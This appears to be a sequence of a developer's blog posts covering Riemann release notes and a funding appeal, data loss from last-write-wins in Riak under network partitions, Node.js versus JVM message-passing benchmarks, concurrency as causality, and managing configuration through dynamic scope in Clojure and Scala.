; A run is a benchmark specification. :f is the function we're going to ; measure--in this case, counting using ; ; 1. an atomic reference ; 2. unordered (commute) transactions ; 3. ordered (alter) transactions. ; ; :before and :after are callbacks to set up and tear down for the test run. (let [runs [(let [a (atom 0)] {:name "atoms" :before #(reset! a 0) :f #(swap! a inc)}) (let [r (ref 0)] {:name "commute" :before #(dosync (ref-set r 0)) :f #(dosync (commute r inc))}) (let [r (ref 0)] {:name "alter" :before #(dosync (ref-set r 0)) :f #(dosync (alter r inc))})] ; For these benchmarks, we'll prime the JVM by doing the test twice and ; discarding the first one's results. We'll run each benchmark 10K times runs (map #(merge % {:prime true :n 10000}) runs) ; And we'll try each one with 1 and 2 threads runs (mapcat (fn [run] (map (fn [threads] (merge run {:threads threads :name (str (:name run) " " threads)})) [1 2])) runs) ; Actually run the function and collect data runs (map record runs) ; And plot the results together plot (latency-plot runs)] ; For this one we'll use a log plot. (.setRangeAxis (.getPlot plot) (org.jfree.chart.axis.LogarithmicAxis. "Latency (s)")) (view plot))

latency.png

When I have something usable outside a REPL I'll publish it to clojars and github. Right now I think the time alignment looks pretty dodgy so I'd like to normalize it correctly, and figure out what exactly “throughput” means. Oh, and the actual timing code is completely naive: no OS cache drop, no forced GC/finalizers, etc. I'm gonna look into tapping Criterium's code for that.

Ready? Grab the tarball or deb from http://aphyr.github.com/riemann/

0.1.3 is a consolidation release, comprising 2812 insertions and 1425 deletions. It includes numerous bugfixes, performance improvements, features–especially integration with third-party tools–and clearer code. This release includes the work of dozens of contributors over the past few months, who pointed out bugs, cleaned up documentation, smoothed over rough spots in the codebase, and added whole new features. I can't say thank you enough, to everyone who sent me pull requests, talked through designs, or just asked for help. You guys rock!

I also want to say thanks to Boundary, Blue Mountain Capital, Librato, and Netflix for contributing code, time, money, and design discussions to this release. You've done me a great kindness.

Bugfixes

  • streams.tagged-all and tagged-any can take single strings now, not just vectors of tags to match.
  • bin/riemann scripts exec java now, instead of launching in a subprocess.
  • Servers bind to 127.0.0.1 by default, instead of (possibly) ipv6 localhost only.
  • Fixed the use of the obsolete :metric_f in the default package configs.
  • Thoroughly commented and restructured the default configs to address common points of confusion.
  • Deb packages will not overwrite /etc/riemann/riemann.config by default, but consider it a conffile.

Major features

  • Librato metrics adapter is now built in.
  • riemann.graphite includes a graphite server which can accept events sent via the graphite protocol.
  • Scheduled tasks are more accurate and consume fewer threads. Riemann's clock can switch between wall-clock and virtual modes, which allows for much faster, more reliable tests.
  • Unified stream window API provides fixed and moving windows over time and events.
  • riemann.time: controllable centralized clocks and task schedulers.
  • riemann.pool: a threadsafe fixed-size bounded-latency regenerating resource pool.

New streams

  • where*: like where, but takes a function instead of an expression.
  • smap: streaming map.
  • sreduce: streaming reduce.
  • fold-interval: reduce over time periods.
  • fixed-time-window: stream which passes on a set of events every n seconds.
  • fixed-event-window: pass on sets of every n disjoint events.
  • moving-time-window: pass on the last n seconds of events.
  • moving-event-window: pass on the last n events.

Enhancements

  • (where) can take an (else) clause for streams which are called when the expression does not match a given event.
  • Converted useless multimethods to regular methods.
  • TCP and UDP servers are roughly 15% faster.
  • New Match protocol for matching predicates like functions, values, and regexes. Used in (where) and (match).
  • streams/match is simpler and more powerful, thanks to Match.
  • Numerous concurrency improvements.
  • Pagerduty adapter is included in config by default.
  • Graphite adapter includes a connection pool, reconnects properly, bounded latency.
  • Email formatting shows more state information in the body.
  • Indexes are seqable.
  • Travis-CI support.
  • Unified protocol buffer parsing paths.
  • Clearer, faster tests, especially in streams.
  • New tasks for packaging under lein2.

Experimental

  • riemann.deps provides an experimental dependency resolver. API subject to change. If you're working with dependent services in Riemann, I'd like your feedback.

What's next for Riemann?

We have quite a few new features in riemann-tools master, so that release should be coming up shortly. The dashboard is in a poor state right now, halfway between old-and-nextgen interfaces: I need to reach feature parity with the old UI and finish styling, then make a release of riemann-dash. I'm also going to rework the web site to be friendlier to beginners, and add a howto section with cookbook-style directions for solving specific problems in Riemann.

In Riemann itself, I have plans to improve Netty performance, and I want to write some Serious Benchmarks to explore concurrency tuning. After that I plan to tackle a Big Project: either persistent indexes or high availability. Those two features will comprise 0.1.4 and 0.1.5.

If you're interested in funding any of this work, please let me know. :)

For the last three years Riemann (and its predecessors) has been a side project: I sketched designs, wrote code, tested features, and supported the community through nights and weekends. I was lucky to have supportive employers which allowed me to write new features for Riemann as we needed them. And yet, I've fallen behind.

Dozens of people have asked for sensible, achievable Riemann improvements that would help them monitor their systems, and I have a long list of my own. In the next year or two I'd like to build:

  • Protocol enhancements: high-resolution times, groups, pubsub, UDP drop-rate estimation
  • Expanding the websockets dashboard
  • Maintain index state through restarts
  • Expanded documentation
  • Configuration reloading
  • SQL-backed indexes for faster querying and synchronizing state between multiple Riemann servers
  • High-availability Riemann clusters using Zookeeper
  • Some kind of historical data store, and a query interface for it
  • Improve throughput by an order of magnitude

I believe that Riemann has great potential to help others understand and monitor their infrastructure–and as an open-source author I can think of no higher goal than to make this possible. I'm going to work full-time on Riemann for the foreseeable future.

I live in San Francisco. My burn rate (rent, utilities, insurance, and food) is roughly $2800 per month. I made 110K for some time and saved well, so I'm extending myself a $5000 gift: to do what I love, and what I think is important. I'll work on Riemann every day, and get as far as I can. I'll write new documentation and review the rapidly expanding body of pull requests from great contributors like Pyr, Banjiewen, and Perezd. I'll provide full-time support on Freenode (#riemann) and on the mailing list, and meet with users to figure out how I can help them best.

If Riemann has been of value to you or your team, and you'd like to support the project, you can help in three ways:

  1. Volunteer. I need your feature requests, your howto guides, your failing tests, your bugfixes and features. I'll do my best to give every one of them my full consideration.

  2. Employ me. I've been honored to receive some really cool job offers in the past few days, but I also plan to take my time. I want to work with intelligent, creative, and down-to-earth people, in high-level languages, and devote at least half of my time to working on Riemann. If you think your team might be a good fit, and you want direct influence over the project's direction, please get in touch.

  3. Donate money. With funding, I can work on Riemann for longer. If you just want to say “thanks”, that's great. If you need a particular capability, want to build a new visualization for your dash, or would like help integrating Riemann into your stack, you can earmark your donation and I'll devote my full attention to your goal. I can work closely with your team, either in-person or remote. I'm happy to sign any NDAs required, so long as functionality that would help everyone is published in the open-source Riemann projects. Either way, I'll thank you as a sponsor in the Riemann documentation and web site.

To give employers a reasonable timetable for hiring me, I'll only accept a few weeks of earmarked donations at a time, or agree to refund a prorated amount if I accept a job offer. If there's significant interest in funding Riemann independently, I'll block off longer stretches of time.

Let me know what you think: aphyr@aphyr.com.

library.jpg

Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem *correctly. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock we write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to consider writes to those fallback copies of vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, one of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, and number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(LWW(a)) = LWW(a). It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.

Or you could use OR-sets. It’s 130 lines of ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.

In response to Results of the 2012 State of Clojure Survey:

The idea of having a primary language honestly comes off to me as a sign that the developer hasn’t spent much time programming yet: the real world has so many languages in it, and many times the practical choice is constrained by that of the platform or existing code to interoperate with.

I've been writing code for ~18 years, ~10 professionally. I've programmed in (chronological order here) Modula-2, C, Basic, the HTML constellation, Perl, XSLT, Ruby, PHP, Java, Mathematica, Prolog, C++, Python, ML, Erlang, Haskell, Clojure, and Scala. I can state unambiguously that Clojure is my primary language: it is the most powerful, the most fun, and has the fewest tradeoffs.

Like Haskell, I view Clojure as an apex language: the best confluence of software ideas towards a unified goal. Where Haskell excels at lazy, pure, strongly typed problems, Clojure is my first choice for dynamic, high-level, general-purpose programming. I wish it were faster, that it had a smarter compiler, that it had CPAN's breadth, that its error messages were less malevolent, that it had a strong type system for some problems. But for all this, you gain a fantastically expressive, concise, rich language built out of strikingly few ideas which lock together beautifully. It gives you a modern build system, a REPL, hot code reloading, hierarchies, parametric polymorphism, protocols, namespaces, immediate, lazy, logical, object-oriented, and functional modes, rich primitives, expressive syntax, immutable and mutable containers, many kinds of concurrency, thoughtful Java integration, hygenic and anaphoric macros, and homoiconicity.

Were Clojure to cease, I would immediately endeavor to replicate its strengths in another language. That's a primary language to me. ;-)

More from Hacker News. I figure this might be of interest to folks working on parallel systems. I'll let KirinDave kick us off with:

Go scales quite well across multiple cores iff you decompose the problem in a way that’s amenable to Go’s strategy. Same with Erlang. No one is making “excuses”. It’s important to understand these problems. Not understanding concurrency, parallelism, their relationship, and Amdahl’s Law is what has Node.js in such trouble right now.

Ryah responds:

Trouble? Node.js has linear speedup over multiple cores for web servers. See http://nodejs.org/docs/v0.8.4/api/cluster.html for more info.

It's parallel in the same sense that any POSIX program is: Node pays a higher cost than real parallel VMs in serialization across IPC boundaries, not being able to take advantage of atomic CPU operations on shared data structures, etc. At least it did last time I looked. Maybe they're doing some shm-style magic/semaphore stuff now. Still going to pay the context switch cost.

this is the sanest and most pragmatic way server a web server from multiple threads

Threads and processes both require a context switch, but on posix systems the thread switch is considerably less expensive. Why? Mainly because the process switch involves changing the VM address space, which means all that hard-earned cache has to be fetched from DRAM again. You also pay a higher cost in synchronization: every message shared between processes requires crossing the kernel boundary. So not only do you have a higher memory use for shared structures and higher CPU costs for serialization, but more cache churn and context switching.

it’s all serialization - but that’s not a bottleneck for most web servers.

I disagree, especially for a format like JSON. In fact, every web app server I've dug into spends a significant amount of time on parsing and unparsing responses. You certainly aren't going to be doing computationally expensive tasks in Node, so messaging performance is paramount.

i’d love to hear your context-switching free multicore solution.

I claimed no such thing: only that multiprocess IPC is more expensive. Modulo syscalls, I think your best bet is gonna be n-1 threads with processor affinities taking advantage of cas/memory fence capabilities on modern hardware.

A Node.js example

Here are two programs, one in Node.js, and one in Clojure, which demonstrate message passing and (for Clojure) an atomic compare-and-set operation.

Node.js: https://gist.github.com/3200829

Clojure: https://gist.github.com/3200862

Note that I picked really small messages–integers–to give Node the best possible serialization advantage.

$ time node cluster.js Finished with 10000000 real 3m30.652s user 3m17.180s sys 1m16.113s

Note the high sys time: that's IPC. Node also uses only 75% of each core. Why?

$ pidstat -w | grep node 12:13:24 PM PID cswch/s nvcswch/s Command 11:47:47 AM 25258 48.22 2.11 node 11:47:47 AM 25260 48.34 1.99 node

100 context switches per second.

$ strace -cf node cluster.js Finished with 1000000 % time seconds usecs/call calls errors syscall ------ ----------- ----------- --------- --------- ---------------- 97.03 5.219237 31 168670 nanosleep 1.63 0.087698 0 347937 61288 futex 1.01 0.054567 0 1000007 1 epoll_wait 0.20 0.010581 0 1000006 write 0.11 0.005863 0 1000005 recvmsg

OK, so every send requires a call to write(), and every read takes a call to epoll_wait() and recvmsg(). It takes 3.5 syscalls to send a message. We're spending a lot of time in usleep, and roughly 34% of messages involved futex–which I'm hoping means the Node authors did their IPC properly instead of polling streams.

[Edit: Thanks @joedamato, I was forgetting -f]

The JVM

Now let's take a look at that Clojure program, which uses 2 threads passing messages over a pair of LinkedTransferQueues. It uses 97% of each core easily. Note that the times here include ~1 second of jvm startup.

$ time java -jar target/messagepassing-0.1.0-SNAPSHOT-standalone.jar queue 10000000 "Elapsed time: 53116.427613 msecs" real 0m54.213s user 1m16.401s sys 0m6.028s

Why is this version over 3 times faster? Well mostly because it's not serializing and isn't javascript–but on top of that, it causes only 11 context switches per second:

$ pidstat -tw -p 26537 Linux 3.2.0-3-amd64 (azimuth) 07/29/2012 _x86_64_ (2 CPU) 11:52:03 AM TGID TID cswch/s nvcswch/s Command 11:52:03 AM 26537 - 0.00 0.00 java 11:52:03 AM - 26540 0.01 0.00 |__java 11:52:03 AM - 26541 0.01 0.00 |__java 11:52:03 AM - 26544 0.01 0.00 |__java 11:52:03 AM - 26549 0.01 0.00 |__java 11:52:03 AM - 26551 0.01 0.00 |__java 11:52:03 AM - 26552 2.16 4.26 |__java 11:52:03 AM - 26553 2.10 4.33 |__java

And queues are WAY slower than compare-and-set, which involves basically no context switching:

$ time java -jar target/messagepassing-0.1.0-SNAPSHOT-standalone.jar atom 10000000 "Elapsed time: 999.805116 msecs" real 0m2.092s user 0m2.700s sys 0m0.176s $ pidstat -tw -p 26717 Linux 3.2.0-3-amd64 (azimuth) 07/29/2012 _x86_64_ (2 CPU) 11:54:49 AM TGID TID cswch/s nvcswch/s Command 11:54:49 AM 26717 - 0.00 0.00 java 11:54:49 AM - 26720 0.00 0.01 |__java 11:54:49 AM - 26728 0.01 0.00 |__java 11:54:49 AM - 26731 0.00 0.02 |__java 11:54:49 AM - 26732 0.00 0.01 |__java

It's harder to interpret strace here because the JVM startup involves a fair number of syscalls. Subtracting the cost to run the program with 0 iterations, we can obtain the marginal cost of each message: roughly 1 futex per 24,000 ops. I suspect the futex calls here are related to the fact that the main thread and most of the clojure future pool are hanging around doing nothing. The work itself is basically free of kernel overhead.

TL;DR: node.js IPC is not a replacement for a real parallel VM. It allows you to solve a particular class of parallel problems (namely, those which require relatively infrequent communication) on multiple cores, but shared state is basically impossible and message passing is slow. It's a suitable tool for problems which are largely independent and where you can defer the problem of shared state to some other component, e.g. a database. Node is great for stateless web heads, but is in no way a high-performance parallel environment.

As KirinDave notes, different languages afford different types of concurrency strategies–and some offer a more powerful selection than others. Pick the language and libraries which match your problem best.

This is a response to a Hacker News thread asking about concurrency vs parallelism.

Concurrency is more than decomposition, and more subtle than “different pieces running simultaneously.” It's actually about causality.

Two operations are concurrent if they have no causal dependency between them.

That's it, really. f(a) and g(b) are concurrent so long as a does not depend on g and b does not depend on f. If you've seen special relativity before, think of “concurrency” as meaning “spacelike”–events which can share no information with each other save a common past.

The concurrency invariant allows a compiler/interpreter/cpu/etc to make certain transformations of a program. For instance, it can take code like

x = f(a) y = g(b)

and generate

y = g(b) x = f(a)

… perhaps because b becomes available before a does. Both programs will produce identical functional results. Side effects like IO and queue operations could strictly speaking be said to violate concurrency, but in practice these kinds of reorderings are considered to be acceptable. Some compilers can use concurrency invariants to parallelize operations on a single chip by taking advantage of, say, SIMD instructions or vector operations:

PIPELINE1 PIPELINE2 x = f(a) y = g(b)

Or more often, vectorized variants of pure functions

[x1, x2, x3, x4] = [f(a1), f(a2), f(a3), f(a4)]

where f could be something like “multiply by 2”.

Concurrency allows for cooperative-multitasking optimizations. Unix processes are typically concurrent with each other, allowing the kernel to schedule them freely on the CPU. It also allows thread, CPU, and machine-level parallelism: executing non-dependent instructions in multiple places at the same wall-clock time.

CPU1 CPU2 x = f(a) y = g(b)

Languages provide a range of constructs for implicit and explicit concurrency (with the aim of parallelism), ranging from compiler optimizations that turn for loops into vector instructions, push matrix operations onto the GPU and so on; to things like Thread.new, Erlang processes, coroutines, futures, agents, actors, distributed mapreduce, etc. Many times the language and kernel cooperate to give you different kinds of parallelism for the same logical concurrency: say, executing four threads out of 16 simultaneously because that's how many CPUs you have.

What does this mean in practice? It means that the fewer causal dependencies between parts of your program, the more freely you, the library, the language, and the CPU can rearrange instructions to improve throughput, latency, etc. If you build your program out of small components that have well-described inputs and outputs, control the use of mutable shared variables, and use the right synchronization primitives for the job (shared memory, compare-and-set, concurrent collections, message queues, STM, etc.), your code can go faster.

Most applications have configuration: how to open a connection to the database, what file to log to, the locations of key data files, etc.

Configuration is hard to express correctly. It’s dynamic because you don’t know the configuration at compile time–instead it comes from a file, the network, command arguments, etc. Config is almost always implicit, because it affects your functions without being passed in as an explicit parameter. Most languages address this in two ways:

Globals

Global variables are accessible in every scope, so they make great implicit parameters for functions.

module App API_SERVER = "api3" end def save(record) http_put(APP::API_SERVER, record) end

Classes are often global, so you can also attach config to that class’s eigenclass, singleton object, or what have you:

class App def self.config; @config; end end App.config.api_server = "api3" App.config.api_server

Erlang apps often handle config with a globally-named module:

{ok, Server} = app_config:get(api_server),

The global variable model is concise and simple; it’s what you should reach for right away. Every thread sees the same values. In fact, all code everywhere sees the same values. Yet there are shortcomings: what if you’re writing a library? What about tests, where you might call the same function with several different configurations? What if you’re running more than one copy of your application concurrently?

Object graph traversal

An advanced OOP programmer may solve the global problem by putting configuration into instances. The application sets up a graph of instances, each with the configuration it needs to do its job.

class App def initialize(config) @api_client = App::APIClient config[:api_server] @logger = Logger.new config[:logger] end end

… and so forth. What if the APIClient needs to use the logger? You could keep a pointer to the application around:

class APIClient def initialize(app, config) @app = app @server = config[:server] end def get @app.logger.log "getting" end end

And traverse the graph of objects in your application. This basically amounts to passing a configuration parameter into every constructor, but has the added benefit of letting you look up other objects in the Application: maybe other local services you might need. It’s a good way to let different components work together cleanly without making their dependencies explicit: the Application doesn’t need to know exactly what services an APIClient needs. Hoorah, encapsulation! It’s also thread-safe: you can create as many applications concurrently as you like, and they won’t step on each other.

On the other hand, you do a lot of traversing, and since these are instance variables, there’s no way to refer to them within other functions, like class methods. It’s also more difficult to test, since you have to stand up all the dependencies (mocked or otherwise) in order to create an object.

At this point, someone else reading this article is screaming “dependency injection frameworks” and pulling out XML. But before we pull out DI, let’s back up and think.

Backing up for a second

What we really want from configuration is to take functions like this:

f(config, x) = g(config, x * 2) g(config, y) = h(config, y + 1) h(config, z) = config + z

… and express them like this:

f(x) = g(x*2) g(y) = h(y+1) h(z) = config + z

We want the config variable to become implicit so that f and g are simplified. f and g do depend on config–but config may be irrelevant to their internal definition, and explicitly tracking every parameter dependency in the system can be exhausting. These implicit variables are known as dynamic scope in programming languages: variables which are bound in every function in a call stack, but are not explicit in their signatures. More particularly, we want two properties:

  1. The variable is bound only within and below the binding expression. When control returns from the binding expression, the variable reverts to its previous value.

  2. The variable is bound only for the thread that created it, and threads created from the bound scope; that is to say, two parallel invocations of f() can have different values of config. This lets us run, say, two copies of an application at the same time.

In Scala, one kind of implicit scope is provided by implicit parameters, which allow enclosing scope to carry down (at least) one level, to functions which have arguments of the same name and type, and which are tagged as “implicit”. (Well, at least, I think that’s what they do; A Tour of Scala: Implicit Parameters is beyond my mortal comprehension). Implicit parameters don’t carry across threads, which makes it a little tough to defer operations using, say, futures.

In Java, one might consider an InheritableThreadLocal for the task. That gives us the thread isolation property, provided that one remembers to clean up the thread local appropriately at the end of the binding context. Many Java libraries use this to provide, say, request context in a web app. Scala neatly wraps this construct with DynamicVariable, a mutable, thread-local, thread-inherited object which is bound only while a given closure is running. Since Scala doesn’t actually have dynamic scope, we still need to access the DynamicVariable object statically. No problem: we can bind it to a singleton object, just like the Ruby examples earlier:

class App { def start() { App.config.withValue(someConfigStructure) { httpServer.run(); } } } object App { val config = new DynamicVariable[MyConfig]; } class HttpServer { def run() { listen(App.config.value.httpPort) } }

There’s a bit of a wart in that we need to call config.value() in order to get the currently bound value, but the semantics are sound, the code is readable, and there’s no extraneous bookkeeping.

Dynamic scope

In languages that support dynamic scope (Most Lisps, Perl, Haskell (sort of)), we can express this directly:

(ns app.config) (def ^:dynamic config nil) (ns app.core) (defn start [] (binding [app.config/config some-config-structure] (http-server/run))) (ns app.http-server (:use app.config)) (defn run [] (listen (:http-port config)))

One of the arguments against dynamic scope is that it can lead to name capture: a dynamic binding for “config” could break a function deep in someone else’s code that used that variable name. Clojure uses namespaces to separate vars, neatly allowing us to write either “app.config/config”, or, having included app.config, use the short name “config”. Other code remains unaffected.

Dynamic var bindings in Clojure have a root value (shared between all threads), and an overrideable thread-local value. However, not all Clojure closures close over dynamic vars! New threads do not inherit the dynamic frames of their parents by default: only future, bound-fn, and friends capture their dynamic scope. (Thread. (fn [] …)) will run with fresh (root) dynamic bindings. Use (bound-fn) where you want to preserve the current dynamic bindings between threads, and (fn) where you wish to reset them.

Thread-inheritable dynamic vars in Clojure

Alternatively, we could adopt Scala’s approach: define a new kind of reference, backed by an InheritableThreadLocal:

(defn thread-inheritable "Creates a dynamic, thread-local, thread-inheritable object, with initial value 'value'. Set with (.set x value), read with (deref x)." [value] (doto (proxy [InheritableThreadLocal IDeref] [] (deref [] (.get this))) (.set value)))

That proxy expression creates a new InheritableThreadLocal which also implements IDeref, Clojure’s interface for dereferenceable things like vars, refs, atoms, agents, etc. Now we just need a macro to set the local within some scope.

